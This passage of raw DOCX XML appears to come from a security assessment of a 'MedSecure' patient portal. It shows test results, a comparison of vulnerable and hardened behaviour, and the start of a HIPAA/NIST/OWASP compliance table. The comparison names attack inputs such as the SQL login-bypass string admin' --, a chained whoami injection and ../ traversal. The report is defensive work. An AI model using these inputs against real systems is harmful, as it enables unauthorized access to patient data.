                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Focus &amp; Test Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Test Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pass / Fail Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test_crypto_validation.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PBKDF2 hashing, salts, Fernet AES encryption, tamper checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17 Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17 / 17 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test_functional.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication workflows, RBAC access gates, logging, storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9 Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9 / 9 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>test_security_attacks.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLi bypass, XSS, Command injection, Path traversal, IDOR, Lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10 Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10 / 10 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Total Validation Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Comprehensive End-to-End Security &amp; Functional Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>36 Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>36 / 36 Passed (100%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Simulated Exploit Results (Side-by-Side Comparison)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection Login Bypass: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app allowed login as administrator with admin' --. Hardened app rejected payload with 401 Unauthorized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS Injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app reflected unescaped &lt;script&gt; tag. Hardened app encoded payload into safe HTML entities (&amp;lt;script&amp;gt;).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OS Command Injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app executed chained whoami command. Hardened app rejected input and used non-shell socket check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal Access: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app allowed downloading database file via ../. Hardened app asserted canonical path boundaries and blocked request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pickle Deserialization RCE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app executed arbitrary commands upon unmarshaling. Hardened app used signed JSON and rejected forged signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR Patient Record Access: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app allowed unauthorized patient Bob to view Alice's records. Hardened app enforced ownership checks and returned 403 Forbidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute-Force Credential Stuffing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable app allowed unlimited login attempts. Hardened app locked account for 5 minutes after 5 consecutive failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>7. Regulatory Compliance Mapping &amp; Residual Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The remediated MedSecure application was mapped against international security frameworks and legal standards governing patient health data.</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3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Regulatory Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mandated Control Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implementation in MedSecure Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HIPAA Security Rule § 164.312(a)(2)(iv)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Encryption of Protected Health Information (PHI) at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Fernet AES-128-CBC + HMAC-SHA256 authenticated encryption on SSN, credit cards, and clinical diagnoses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>NIST SP 800-63B § 5.1.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Memorized secret authenticators and strong password hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PBKDF2-HMAC-SHA256 with 600,000 iterations, 256-bit CSPRNG salts, and constant-time comparisons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>OWASP ASVS Level 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role-Based Access Control &amp; Object-level Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Centralized @login_required and @role_required decorators with explicit resource ownership verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
